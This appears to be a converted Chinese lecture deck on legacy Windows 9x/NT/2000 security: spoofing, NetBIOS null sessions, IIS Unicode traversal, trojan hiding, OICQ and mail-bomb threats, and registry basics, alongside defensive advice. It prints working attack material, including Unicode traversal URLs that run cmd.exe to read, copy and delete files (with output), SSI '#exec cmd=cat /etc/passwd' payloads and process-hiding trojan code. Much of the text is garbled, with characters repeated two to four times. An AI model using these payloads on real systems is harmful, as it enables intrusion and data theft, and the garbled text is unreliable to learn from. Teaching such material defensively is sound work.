操作系统安全二

WINDOWS9x/2000/NT系统安全1Windows9x漏洞2Windows文件扩展名欺骗漏洞

漏洞描述：

如果命名一个文件名字："file.html

.exe"其中用ASCII的255来代替其中的空格，那么，在WINDOWS里面将只能看见文件名是：file.html。

并且这个文件名欺骗对IE的下载对话框同样存在，恶意者可能连接一个可执行文件，但是让人看起来象一个HTML网页3Windows快捷方式漏洞Windows快捷方式包括扩展名为lnk、pif、url的文件。其中url文件为纯文本格式lnk

和pif文件为二进制文件。这三种快捷方式都可以自定义图标文件，当把图标文件名设定为

Windows的默认设备名时，由于设备名称解析漏洞，可导致Windows95/98系统崩溃。由于

对图标的搜索是由Explorer自动完成的，所以只要快捷方式在资源浏览器中出现，就会导

致系统崩溃。如果快捷方式在桌面上，那么系统一启动就会崩溃。只有以DOS启动系统，在

命令行下删除。由于无法直接设置图标文件名为设备名，只有通过直接编辑的方式来创建。

4Windows快捷方式漏洞对于WindowsNT/2000系统不会由于设备名称解析而崩溃。但当我们创建一个完全由

ASCII字符填充组成的pif文件时会出现以下情况：

1）一个非法的pif文件（用ascii字符'x'填充）至少要369字节，系统才认为是一个

合法的pif文件，才会以pif的图标[pifmgr.dll,0]显示，在属性里有程序、

字体、内存、屏幕”等内容。而且仅仅当一个非pif文件的大小是369字节时察看

属性的“程序”页时，不会发生程序错误，哪怕是370字节也不行。当对一个大于

369字节的非法pif文件察看属性的“程序”页时，Explorer会出错，提示：

5Windows快捷方式漏洞"0x77650b82"指令引用的"0x000000000"内存。该内存不能为"read"

但这种错误并不会引起缓冲溢出的安全问题。初步分析了一下，问题出在pif文件

的16进制地址：

0x00000181[0x87]0x00000182[0x01]和

0x00000231[0xC3]0x00000232[0x02]

即使是一个合法pif文件，只要改动这四处的任意一处，也会引起程序错误。而只

要把0x00000181和0x00000182的值改为[0xFF][0xFF]，那么其它地址任意更改

都不会引起错误。

6Windows快捷方式漏洞2）当一个大于30857的非法pif文件（用ascii字符'x'填充）出现在资源管理器中时，

会使系统的CPU资源占用达100%，根本不能察看其属性页。也无法在资源管理器中

对其进行任何操作，甚至不能在命令提示符中删除。试图删除时会提示会提示：

“进程无法访问文件，因为另一个程序正在使用此文件。”

但只要把0x00000181和0x00000182中任意一处改为[0xFF]这种情况就不会发生。

这是由于资源浏览器试图显示其实并不存在的图标引起的。如果快捷方式在桌面

上，那么系统一启动这种情况就会出现。只有使用任务管理器中止Explorer.exe

的进程，再启动一个命令提示符，从命令行下删除。

此问题仅影响WindowsNT/2000系统，不影响Windows95/98。7系统安全漏洞及解决方案NetBIOS的信息泄漏netuse\\server\IPC$""/user:""

//此命令用来建立一个空会话netview\\server

//此命令用来查看远程服务器的共享资源服务器名称注释

\\pc1

\\pc2

命令成功完成。nettime\\server

//此命令用来得到一个远程服务器的当前时间。

8系统安全漏洞及解决方案nbtstat-Aserver

//此命令用来得到远程服务器的NetBIOS用户名字表NetBIOSRemoteMachineNameTable

Name

Type

Status

NULL

<00>UNIQUE

Registered

NULL

<20>UNIQUE

Registered

INTERNET

<00>GROUP

Registered

XIXI

<03>UNIQUE

Registered

INet~Services

<1C>GROUP

Registered

IS~NULL

<00>UNIQUE

Registered

INTERNET

<1E>GROUP

Registered

ADMINISTATOR

<03>UNIQUE

Registered

INTERNET

<1D>UNIQUE

Registered

..__MSBROWSE__.<01>GROUP

RegisteredMACAddress=00-54-4F-34-D8-80

9系统安全漏漏洞及解决决方案修改注册表表一劳永逸逸HKEY-LOCAL_MACHINE\SYSTEM\CurrentControSet\Control\LSAValueName:RestrictAnonymousDataType:REG_DWORDValue:110MicrosoftIIS导致网网络泄露11MicrosoftWindows98/2000Folder.htt漏漏洞(2000-8-17)windows98和2000中，一一个名为Folder.htt的文件件决定了文文件夹以何何种方式显显示为web页面。。这个文件件包含活动动的脚本解解释执行。。如果一个个用户任意意打开了一一个文件夹夹，同时以以web页页面形式察察看该文件件夹的选项项为enable的的话（默认认选项），，则Folder.htt文文件中的任任何代码均均会以该用用户的特权权等级运行行。通过本本地文件夹夹和远程UNC共享享都可以利利用此漏洞洞。

问题题出在ShellDefViewActiveX控件件。这个控控件用来确确定对选中中的文件执执行什么操操作。为了了激活对选选中的文件件的默认操操作，它使使用无任何何参数的InvokeVerb()方法。文文件夹中的的第一个文文件可以通通过FileList.focus()方法法被自动选选中。因此此，如果创创建一个文文件，它默默认的打开开操作为““执行”，，而且处于于文件列表表的第一个个位置（默默认的文件件排序方式式是按字母母顺序，例例11111111.bat会因此被被排在首位位），则只只要打开该该文件所在在的文件夹夹，就会选选中并运行行该文件。。12UNICODE漏洞洞的原理此漏洞从中中文IIS4.0+SP6开开始，还影影响中文WIN2000+IIS5.0、中文文WIN2000+IIS5.0+SP1，台台湾繁体中中文也同样样存在这样样的漏洞。。

中文文版的WIN2000中，UNICODE编码码存在BUG，在在UNICODE编编码中%c1%1c-〉(0xc1-0xc0)*0x40+0x1c=0x5c=‘‘/‘%c0%2f-〉(0xc0-0xc0)*0x40+0x2f=0x2f=‘‘＼‘NT4中/编码码为%c1%9c在在英文文版里：WIN2000英文文版%c0%af但但从国国外某些站站点得来的的资料显示示，还有以以下的编码码可以实现现对该漏洞洞的检测.

%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af%f0%80%80%af

%fc%80%80%80%80%af系统安全漏漏洞及解决决方案13系统安全漏漏洞及解决决方案UNICODE编码码漏洞简单单利用的命命令1、显示文文件内容如果想显示示里面的其其中一个badboy.txt文本文文件，我们们可以这样样输入（htm,html，，asp,bat等等文件都是是一样的））http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:＼＼badboy.txt那那么该文文件的内容容就可以通通过IE显显示出来。。2、建立文文件夹的命命令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:＼badboy运运行后我们们可以看到到

返回这这样的结果果：CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:14系统安全漏漏洞及解决决方案3、删除空空的文件夹夹命令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:＼badboy返返回信息息同上4、删除文文件的命令令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:＼badboy.txt

返回信信息同上5、copy文件且且改名的命命令http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:＼badboy.txtbad.txt

返回回信息：CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:1file(s)copied.15系统安全漏漏洞及解决决方案显示目标主主机当前的的环境变量量/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set

返回回的信息：：

CGIErrorThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:ALLUSERSPROFILE=E:＼DocumentsandSettings＼AllUsersAUTH_TYPE=Negotiate

AUTH_USER=BADBOYCL-DQQZQQ＼＼badboyCASL_BASEDIR_ENV=E:＼＼scan＼CyberCopScanner＼caslCommonProgramFiles=E:＼ProgramFiles＼＼CommonFiles

COMPUTERNAME=BADBOYCL-DQQZQQComSpec=E:＼WINNT＼system32＼cmd.exe16系统安全漏漏洞及解决决方案CONTENT_LENGTH=0GATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=*/*HTTP_ACCEPT_LANGUAGE=zh-cnHTTP_CONNECTION=Keep-AliveHTTP_HOST=

HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE5.01;WindowsNT5.0)HTTP_AUTHORIZATION=NegotiateTlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADAAMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAYQBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vzSAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==HTTP_ACCEPT_ENCODING=gzip,deflateHTTPS=offINSTANCE_I17系统安全漏漏洞及解决决方案18系统安全漏漏洞及解决决方案19越权访问drwtsn32.exe（（Dr.Watson）是是一个Windows系统内内置的程序序错误调试试器。默认认

状态下下，出现程程序错误时时，Dr.Watson将将自动启启动，除非非系统上安安装了VC等其他具具有调试功功能的软件件更改了默默认值。注注册表项：：

[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]下下的Debugger项的的值指定了了调试器及及使用的命命令；Auto项项决定是否否自动诊断断错误，并并记录相应应的诊断信信息。[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]20越权访问在Windows2000中drwtsn32.exe默认会会将故障转转储文件user.dmp存存放在目录录“\DocumentsandSettings\AllUsers\Documents\DrWatson”下。。权限为Everyone完完全控制。。在WindowsNT中中被存储在在“\WINNT\”中，everyone组组至少有读读取权限。。

由于user.dmp中中存储的内内容是当前前用户的部部分内存镜镜像，所以以可能导致致各种敏感感信息泄漏漏，例如帐帐号、口令令、邮件、、浏览过的的网页、正正在编辑的的文件等等等，具体取取决于崩溃溃的应用程程序和在此此之前用户户进行了那那些操作。。21越权访问drwtsn32参参数drwtsn32[-i][-g][-ppid][-eevent][-?]-i将将DrWtsn32当当作默认认应用程程序错误误调试程程序-g被被忽略，，但作为为WINDBG和和NTSD的的兼容容而被提提供-ppid要要调试试的进程程id

-eevent表示示进程附附加完成成的事件件

-?这个个屏幕22木马程序序原理木马的分分类木马程序序技术发发展至今今，已经经经历了了4代，，第一代代，即是是简单的的密码窃窃取，发发送等，，没有什什么特别别之处。。第二代代木马，，在技术术上有了了很大的的进步，，冰河可可以说为为是国内内木马的的典型代代表之一一。第三三代木马马在数据据传递技技术上，，又做了了不小的的改进，，出现了了ICMP等类类型的木木马，利利用畸形形报文传传递数据据，增加加了查杀杀的难度度。第四四代木马马在进程程隐藏方方面，做做了大的的改动，，采用了了内核插插入式的的嵌入方方式，利利用远程程插入线线程技术术，嵌入入DLL线程。。或者挂挂接PSAPI,实现现木马程程序的隐隐藏，甚甚至在WindowsNT/2000下下，都达达到了良良好的隐隐藏效果果。相信信，第五五代木马马很快也也会被编编制出来来。。23木马程序序原理木马程序序的隐藏藏技术进程：一个正正常的Windows应用程程序，在在运行之之后，都都会在系系统之中中产生一一个进程程，同时时，每个个进程，，分别对对应了一一个不同同的PID（ProgressID,进进程标标识符））这个进进程会被被系统分分配一个个虚拟的的内存空空间地址址段，一一切相关关的程序序操作，，都会在在这个虚虚拟的空空间中进进行。线程：一个进进程，可可以存在在一个或或多个线线程，线线程之间间同步执执行多种种操作，，一般地地，线程程之间是是相互独独立的，，当一个个线程发发生错误误的时候候，并不不一定会会导致整整个进程程的崩溃溃。服务：一个进进程当以以服务的的方式工工作的时时候，它它将会在在后台工工作，不不会出现现在任务务列表中中，但是是，在WindowsNT/2000下下，你仍仍然可以以通过服服务管理理器检查查任何的的服务程程序是否否被启动动运行。。24木马程序序原理WINAPIWinMain(HINSTANCE,HINSTANCE,LPSTR,int){try{DWORDdwVersion=GetVersion();//取得Windows的版本本号if(dwVersion>=0x80000000)//Windows9x隐藏任任务列表表{int(CALLBACK*rsp)(DWORD,DWORD);HINSTANCEdll=LoadLibrary("KERNEL32.DLL");//装入KERNEL32.DLLrsp=(int(CALLBACK*)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");//找到RegisterServiceProcess的入口口rsp(NULL,1);//注册服服务FreeLibrary(dll);//释放DLL模模块}}catch(Exception&exception)//处理异异常事件件{//处理理异常事事件}return0;}25木马程序序原理程序的自自加载运运行技术术1、集成成到程序序中6、在在System.ini中藏藏身2、隐藏藏在配置置文件中中7、隐形形于启动动组中3、潜伏伏在Win.ini中中8、隐蔽蔽在Winstart.bat中4、伪装装在普通通文件中中9、、捆绑在在启动文文件中5、内置置到注册册表中10、设设置在超超级连接接中26木马程序序原理木马程序序的建立立连接的的隐藏合并端口口法，也也就是说说，使用用特殊的的手段，，在一个个端口上上同时绑绑定两个个TCP或者UDP连连接，这这听起来来不可思思议，但但事实上上确实如如此，而而且已经经出现了了使用类类似方法法的程序序，通过过把自己己的木马马端口绑绑定于特特定的服服务端口口之上，，（比如如80端端口的HTTP，谁怀怀疑他会会是木马马程序呢呢？）从从而达到到隐藏端端口的目目地。另另外一种种办法，，是使用用ICMP（InternetControlMessageProtocol））协议进进行数据据的发送送,原理理是修改改ICMP头的的构造，，加入木木马的控控制字段段，这样样的木马马，具备备很多新新的特点点，不占占用端口口的特点点，使用用户难以以发觉，，同时，，使用ICMP可以穿穿透一些些防火墙墙，从而而增加了了防范的的难度。。之所以以具有这这种特点点，是因因为ICMP不不同于TCP，，UDP，ICMP工工作于网网络的应应用层不不使用TCP协协议。27木马程序序原理木马程序序的建立立连接的的隐藏28木马程序序原理29浏览网页页也会中中木马1.MIME简简介MIME(MultipurposeInternetMailExtentions)，一般般译作““多用途途的网际际邮件扩扩充协议议”。顾顾名思义义，它可可以传送送多媒体体文件，，在一封封电子邮邮件中附附加各种种格式文文件一起起送出。。现在它它已经演演化成一一种指定定文件类类型(Internet的任任何形式式的消息息：e-mail，usenet新新闻和Web)的通用用方法。。在使用用CGI程序时时你可能能接触过过MIME类型型，其中中有一行行叫作Content-type的的语句，，它用来来指明传传递的就就是MIME类类型的文文件(如如text/html或text/plain)。30浏览网页页也会中中木马IE是如如何处理理附件的的：一般般情况下下如果附附件是文文本文件件，IE会读它它，如果果是VIDEOCLIP，，IE会会查看它它；如果果附件是是图形文文件，IE就会会显示它它；如果果附件是是一个EXE文文件呢？？IE会会提示用用户是否否执行！！但令人人恐惧的的是，当当攻击者者更改MIME类型后后，IE就不再再提示用用户是否否执行而而直接运运行该附附件！从从而使攻攻击者加加在附件件中的程程序、攻攻击命令令能够按按照攻击击者设想想的情况况进行。。31OICQ的安全全纵观针对对OICQ的攻攻击，主主要分为为IP探探测、消消息炸弹弹、密码码和本地地消息破破解、木木马植入入及其它它方式。。推出该该安全手手册的目目的是为为了能让让大多数数对网络络安全不不熟悉的的网民们们能够简简单的防防御这些些攻击。。32OICQ的安全全IP探测测由于OICQ采采用的是是UDP数据包包通讯，，攻击者者只要向向你发送送一个信信息，他他就可以以通过监监视UDP数据据包来获获得你的的IP和和OICQ的端端口号，，从理论论上说，，在直接接通讯的的模式下下，想避避免攻击击者发现现你的IP地址址是十分分困难。。

IP探测的的另一个个方法是是通过端端口扫描描，OICQ的的通讯端端口值默默认情况况下是8000，攻击击者可以以通过集集中扫描描某一地地址段的的8000端口口来获得得那些正正在使用用OICQ的IP地址址。33OICQ的安安全防范IP探测测的主要方法法是：一、阻阻止攻击者与与你直接通讯讯，在OICQ的个人设设定里修改身身份验证默认认值为"需要要身份认证才才能把我加为为好友"，这这样攻击者也也还是可以通通过某些特殊殊的信息发送送软件跟你通通讯，所以你你还应该在系系统参数设置置里把拒绝陌陌生人消息的的选项选上。。另一种阻止止攻击者与你你直接通讯的的方法是通过过代理上OICQ或者隐隐身登陆，这这样攻击者所所看到的IP地址是代理理服务巧删OICQ登录录号码器的IP，隐身登登陆的消息传传递是通过服服务器中转，，这样传给攻攻击者的数据据包的IP地地址是腾讯服服务器的地址址。

修改OICQ通讯讯端口默认值值是避免被攻攻击者扫描的的唯一方法，，它还能防止止攻击者给你你发送垃圾消消息。34OICQ的安安全消息炸弹消息炸弹攻击击原理是利用用UDP数据据通讯不需要要验证确认的的弱点，只要要拿到用户的的IP地址和和OICQ通通讯端口即可可发动攻击。。35OICQ的安安全密码和本地消消息破解通过暴力解密密是一种破解解手段，有些些攻击者还采采用一些键盘盘记录程式来来记录你输入入的帐号和密密码，让你防防不胜防。另另一种获得OICQ密码码的手段是通通过攻击你的的注册邮箱，，由于腾讯有有一个忘记密密码功能，它它将用户的OICQ密码码发送到用户户注册时的邮邮箱里，攻击击者一旦拿到到这个邮箱，，即可以很简简单的拿到你你的密码。36OICQ的安安全一、本地破解解防范破解密码通常常是穷举。不不要用简单的的英文和纯数数字作为密码码，应该是大大小写、数字字、符号的混混合，不要少少于八位，这这样的话密码码就不容易被被破了二、攻击注册册邮箱防范个人资料里和和你申请号码码时所填的mail地址址不要一样，，除非你对你你的密码很有有信心。选择择一个好密码码也是一个好好办法！37OICQ木马马程序剖析GOP木木马程序GOP木马的的检查该木马运行的的时候在Windows的任务窗口口中是看不到到的,你可以以点任务条上上的“开始””、“运行””、“msinfo32”(就是Windows自带的系系统信息，在在“附件”中中)。看其中中的软件环境境→正在运行行的任务。这这才是Windows现现在全部运行行的任务。当当你在运行了了什么东西之之后觉得有问问题的时候就就看看这里。。如果有一个个项目有程序序名和路径，，而没有版本本、厂商和说说明，你就应应该紧张一下下了。GOP木马在这里里显示的版本本为：“不能能用”。如果果你发现GOP木马，先先关掉你的猫猫(断网)，，然后脱机重重新登录一次次你的OICQ，查找电电脑中是否有有record.dat文件(每个个盘都应该查查一下！绝不不放过！)(这是GOP记录OICQ密码的文文档，如果你你的OICQ密码被监控控到了就一定定会有。当然然，即使你中中了木马，在在你还没有用用OICQ的的时候是不会会有这个文件件的。反正现现在不在网上上，不用担心心密码被发走走)。如果有有的话，那么么“恭喜”你你了，100%中了木马马。不信？用用记事本打开开那个record.dat，看看看有没有你的的宝贝OICQ的号码和和密码。你你还可以运运行系统配置置实用程序(开始―运行行―msconfig)，在启动栏栏里，你亦可可发现“WindowsAgent”(就是上上文提到的““定义注册表表键名”,可可能会是其它它键名)38OICQ木马马程序GOP木马的的清除在注册册表的的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键键下添添加一一个键键值来来让木木马自自动运运行，，该木木马也也不例例外。。运行行regedit，，进入入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键键，记记住那那个在在系统统信息息中查查到的的那个个文件件，也也可在在msconfig―启启动――名称称里找找到(在““剖析析木马马的设设置””中，，我们们知道道木马马文件件名是是可以以任意意定制制的，，所以以无法法确定定具体体的文文件名名)的的存放放路径径，删删除该该键值值。然然后关关闭计计算机机，稍稍候一一下启启动计计算机机(注注意：：不要要选重重新启启动)。然然后进进入文文件的的存放放路径径删除除木马马文件件即可可。39恶意程程序邮件炸炸弹原原理E-MAIL炸炸弹原原本泛泛指一一切破破坏电电子邮邮箱的的办法法，一一般的的电子子邮箱箱的容容量在在5，，6M以下下，平平时大大家收收发邮邮件，，传送送软件件都会会觉得得容量量不够够，如如果电电子邮邮箱一一下子子被几几百，，几千千甚至至上万万封电电子邮邮件所所占据据，这这是电电子邮邮件的的总容容量就就会超超过电电子邮邮箱的的总容容量，，以至至造成成邮箱箱超负负荷而而崩溃溃。【kaboom3】】【upyours4】】【Avalanchev2.8】】40恶意程程序邮件炸炸弹防防范⒈不要要将自自己的的邮箱箱地址址到处处传播播，特特别是是申请请上网网帐号号时ISP送的的电子子信箱箱，那那可是是要按按字节节收费费的哟哟！去去申请请几个个免费费信箱箱对外外使用用，随随便别别人怎怎么炸炸，大大不了了不要要了。。⒉最好好用POP3收收信，，你可可以用用Outlook或或Foxmail等POP收信信工具具收取取Email。。例如如用Outlook，你你可以以选择择“工工具””/““收件件箱助助理””，然然后点点击““添加加”在在属性性窗口口可以以设定定对各各种条条件的的Email的的处理理方式式。41恶意程程序邮件炸炸弹防防范⒊当某某人不不停炸炸你信信箱时时，你你可以以先打打开一一封信信，看看清对对方地地址，，然后后在收收件工工具的的过滤滤器中中选择择不再再接收收这地地址的的信，，直接接从服服务器器删除除。4。在在收信信时，，一旦旦看见见邮件件列表表的数数量超超过平平时正正常邮邮件的的数量量的若若干倍倍，应应当马马上停停止下下载邮邮件，，然后后再从从服务务器删删除炸炸弹邮邮件。。⒌不要要认为为邮件件发送送有个个回复复功能能，就就可以以将发发炸弹弹的人人报复复回来来，那那是十十分愚愚蠢的的！发发件人人有可可能是是用的的假地地址发发信，，这个个地址址也许许填得得与收收件人人地址址相同同。这这样你你不但但不能能回报报对方方，还还会使使自己己的邮邮箱彻彻底完完结！！42恶意程程序邮件炸炸弹防防范⒍你还还可以以用一一些工工具软软件防防止邮邮件炸炸弹，，下面面本站站就提提供一一个供供大家家下载载：【【echom201】】这是是一个个功能能强大大的砍砍信机机，每每分钟钟能砍砍到1000封封电子子邮件件，是是对付付邮件件炸弹弹的好好东西西43恶意程程序端口攻攻击原原理这类软软件是是利用用Window95/NT系系统本本身的的漏洞洞，这这与Windows下微微软网网络协协议NetBIOS的一一个例例外处处理程程序OOB（OutofBand）有有关。。只要要对方方以OOB的方方式，，就可可以通通过TCP/IP传传递一一个小小小的的封包包到某某个IP地地址的的Port139上上，该该地址址的电电脑系系统即即（WINDOWS95/NT））就会会“应封包包而死死”，自动动重新新开机机，你你未存存档的的所有有工作作就得得重新新再做做一遍遍了。。44恶意程程序端口攻攻击防防范常见的的端口口攻击击器有有【uKe23】【【voob】【【WINNUKE2】。。如果果你还还是用用的win95，那那您就就要当当心了了。防防范范将将你你的Windows95马上上升级级到Windows98，首首先修修正Win95的BUG，在在微软软主页页的附附件中中有对对于Win95和OSR2以以前的的版本本的补补丁程程序，，Win98不不需要要。然然后学学会隐隐藏自自己的的IP，包包括将将ICQ中中"IP隐隐藏"打开开，注注意避避免在在会显显示IP的的BBS和和聊天天室上上暴露露真实实身份份，特特别在在去黑黑客站站点访访问时时最好好先运运行隐隐藏IP的的程序序。45恶意程程序JAVA炸炸弹弹原理理很多人人在聊聊天室室中被被炸了了以后后，就就以为为是被被别人人黑了了，其其实不不是的的。炸炸弹有有很多多种，，有的的是造造成电电脑直直接死死机，，有的的是通通过HTML语语言，，让你你的浏浏览器器吃完完你的的系统统资源源，然然后你你就死死机了了。46恶意程程序JAVA炸炸弹弹防范范唯一的的防范范方法法就是是你在在聊天天室聊聊天时时，特特别是是支持持HTML的聊聊天室室（比比如湛湛江，，新疆疆等））请你你一定定记住住关掉掉你浏浏览器器里的的java功能能，还还要记记住不不要浏浏览一一些来来路不不明的的网站站和不不要在在聊天天室里里按其其他网网友发发出的的超级级链接接，这这样可可以避避免遭遭到恶恶作剧剧者的的攻击击.47恶意程程序浏览主主页硬硬盘共共享“万花花谷””，如如果进进入该该网页页浏览览者注注册表表会被被修改改，好好多系系统功功能因因此受受到限限制。。最近近又听听说有有网友友在浏浏览网网页时时硬盘盘被共共享，，危害害似乎乎更大大！其实，，所谓谓的浏浏览网网页硬硬盘被被共享享，和和“万万花谷谷”一一样，，受害害者都都是在在浏览览了含含有有有害代代码的的ActiveX网网页文文件后后中招招的。。48恶意程程序浏览主主页硬硬盘共共享防御防防范：：1、不不要轻轻易去去一些些自己己并不不了解解的站站点，，特别别是那那些看看上去去美丽丽诱人人的网网址更更不要要贸然然前往往，否否则吃吃亏的的往往往是你你。2、、运行行IE，点点击““工具具→Internet选选项→→安全全→Internet区区域的的安全全级别别，把把安全全极别别由““中””改为为“高高”3、、由于于该类类网页页是含含有有有害代代码的的ActiveX网网页文文件，，因此此在IE设设置中中将ActiveX插件件和控控件、、Java脚本本等全全部禁禁止就就可以以避免免中招招。具具体方方法是是：在在IE窗口口中点点击““工具具→Internet选选项，，在弹弹出的的对话话框中中选择择“安安全””标签签，再再点击击“自自定义义级别别”按按钮，，就会会弹出出“安安全设设置””对话话框，，把其其中所所有ActiveX插件件和控控件以以及Java相相关全全部选选择““禁用用”即即可。。不过过，这这样做做在以以后的的网页页浏览览过程程中可可能会会造成成一些些正常常使用用ActiveX的的网站站无法法浏览览。唉唉，有有利就就有弊弊，你你还是是自己己看着着办吧吧。4、、对于于Windows98用用户，，请打打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把把其中中的““ActiveXComponent.class”删删掉；；对于于WindowsMe用用户，，请打打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP，把把其中中的““ActiveXComponent.class”删删掉。。请放放心，，删除除这个个组件件不会会影响响到你你正常常浏览览网页页的。。49恶意程程序5、既既然这这类网网页是是通过过修改改注册册表来来破坏坏我们们的系系统，，那么么我们们可以以事先先把注注册表表加锁锁：禁禁止修修改注注册表表，这这样就就可以以达到到预防防的目目的。。不过过，自自己要要使用用注册册表编编辑器器regedit.exe该该怎么么办呢呢？因因此我我们还还要在在此前前事先先准备备一把把“钥钥匙””，以以便打打开这这把““锁””！加锁方方法如如下：：(1)运行行注册册表编编辑器器regedit.exe；；(2)展开开注册册表到到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下下，新新建一一个名名为DisableRegistryTools的的DWORD值值，并并将其其值改改为““1””，即即可禁禁止使使用注注册表表编辑辑器regedit.exe。解锁锁方方法法如如下下：：用用记记事事本本编编辑辑一一个个任任意意名名字字的的.reg文文件件，，比比如如unlock.reg，，内内容容如如下下：：REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:0000000050恶意意程程序序51恶意意程程序序网页页执执行行exe文文件件在服服务务器器端端执执行行文文件件是是靠靠SSI来来实实现现的的，，SSI是是服服务务器器端端包包含含的的意意思思（（不不是是SSL）），，我我们们经经常常使使用用的的#include就就是是服服务务器器端端包包含含的的指指令令之之一一。。不不过过，，这这次次要要介介绍绍的的就就是是#exec。。就就是是他他可可以以实实现现服服务务器器端端执执行行指指令令。。不不过过，，不不能能用用于于.asp的的文文件件。。而而只只能能stm、、.shtm和和.shtml这这些些扩扩展展名名。。而而能能解解释释执执行行他他们们的的就就是是Ssinc.dll。。所所以以，，你你写写好好的的代代码码必必须须保保存存成成.stm等等格格式式才才能能确确保保服服务务器器能能执执行行。。52恶意意程程序序网页页执执行行exe文文件件SSI有有什什么么用用?目目前前，，主主要要有有以以下下几几种种用用用用途途：：1、、显显示示服服务务器器端端环环境境变变量量<#echo>2、、将将文文本本内内容容直直接接插插入入到到文文档档中中<#include>3、、显显示示WEB文文档档相相关关信信息息<#flastmod#fsize>(如如文文件件制制作作日日期期/大大小小等等)4、、直直接接执执行行服服务务器器上上的的各各种种程程序序<#exec>(如如CGI或或其其他他可可执执行行程程序序)5、、设设置置SSI信信息息显显示示格格式式<#config>(如如文文件件制制作作日日期期/大大小小显显示示方方式式)高高级级SSI<XSSI>可可设设置置变变量量使使用用if条条件件语语句句。。53恶意意程程序序<!--#execcmd=””cat/etc/passwd”-->将将会会显显示示密密码码文文件件<!--#execcmd=””dir/b”-->将将会会显显示示当当前前目目录录下下文文件件列列表表<!--#execcgi=””/cgi-bin/gb.cgi”-->将将会会执执行行CGI程程序序gb.cgi。<!--#execcgi=””/cgi-bin/access_log.cgi”-->将将会会执执行行CGI程程序序access_log.cgi54恶意意程程序序防范范方方法法access.conf中的的””OptionsIncludesExecCGI”这这行行代代码码删删除除；；在IIS中中，，要要禁禁用用#exec命令令，，可可修修改改SSIExecDisable元数数据据库库；；55Windows注注册册表表注册册表表的的介介绍绍注册册表表的的修修改改56注册册表表的的基基本本概概念念所谓谓注注册册表表就就是是一一个个庞庞大大的的数数据据库库，，其其中中容容纳纳了了应应用用程程序序和和计计算算机机系系统统的的全全部部配配置置信信息息，，Windows9x系系统统和和应应用用程程序序的的初初始始化化信信息息，，应应用用程程序序和和文文档档文文件件的的关关联联关关系系，，硬硬件件设设备备的的说说明明，，状状态态和和属属性性以以及及各各种种状状态态信信息息和和数数据据。。他他有有两两个个部部分分组组成成：：注注册册表表数数据据库库（（包包括括两两个个文文件件：：SYSTEM.DAT和和USER.DAT））和和注注册册表表编编辑辑器器。。SYSTEM.DAT是是用用来来保保存存微微机机的的系系统统信信息息，，如如安安装装的的硬硬件件和和设设备备驱驱动动程程序序的的有有关关信信息息USER.DAT是是用用来来保保持持每每个个用用户户特特有有的的信信息息，，如如桌桌面面设设置置，，墙墙纸纸和和窗窗口口颜颜色色设设置置等等。。他他们们的的自自备备份份文文件件为为SYSTEM.DAO和和。。注注册册表表编编辑辑器器则则是是来来对对注注册册表表进进行行各各种种编编辑辑工工作作。。57注册表表的构构造系统对对注册册表预预定了了六个个主管管键字字：HKEY_CLASSES_ROOT：文文件扩扩展名名与应应用的的关联联及OLE信息息HKEY_USERS：用用户根根据个个人爱爱好设设置的的信息息。HKEY_CURRENT_USER：当当前登登录用用户控控制面面板选选项和和桌面面等的的设置置，以以及映映射的的网络络驱动动器HKEY_LOCAL_MACHINE：：计算算机硬硬件与与应用用程序序信息息HKEY_DYN_DATA：：即插插即用用和系系统性性能的的动态态信息息HKEY_CURRENT_CONFIG：：计算算机硬硬件配配置信信息58注册表表的构构造注册表表中的的键值值项数数据注册表表通过过键和和子键键来管管理各各种信信息。。但是是注册册表中中的所所有信信息都都是以以各种种形式式的键键值项项数据据保存存的。。在注注册表表编辑辑器右右窗格格中显显示的的都是是键值值项数数据。。这些些键值值项数数据可可以分分为三三种类类型：：1.字字符串串值在注册册表中中，字字符串串值一一般用用来表表示文文件的的描述述和硬硬件的的标识识。通通常由由字母母和数数字组组成，，也可可以是是汉字字，最最大长长度不不能超超过255个字字符。。在本本例中中以"a"="***"表示示。59注册表表的构构造2.二二进制制值在注册册表中中二进进制值值是没没有长长度限限制的的，可可以是是任意意字节节长。。在注注册表表编辑辑器中中，二二进制制以十十六进进制的的方式式表示示。在在本站站中以以"a"=hex:01,00,00,00方方式表表示。。3.DWORD值DWORD值是是一个个32位(4个个字节节)的的数值值。在在注册册表编编辑器器中也也是以以十六六进制制的方方式表表示。。在本本站中中以"a"=dword:00000001表表示。。60注册表表的双双重入入口问问题在注册册表中中经常常出现现双重重入口口（分分支）），例例如，，有一一些在在HKEY_CLASSES_ROOT中中的键键同样样会在在HKEY_LOCAL_MACHINE中出出现。。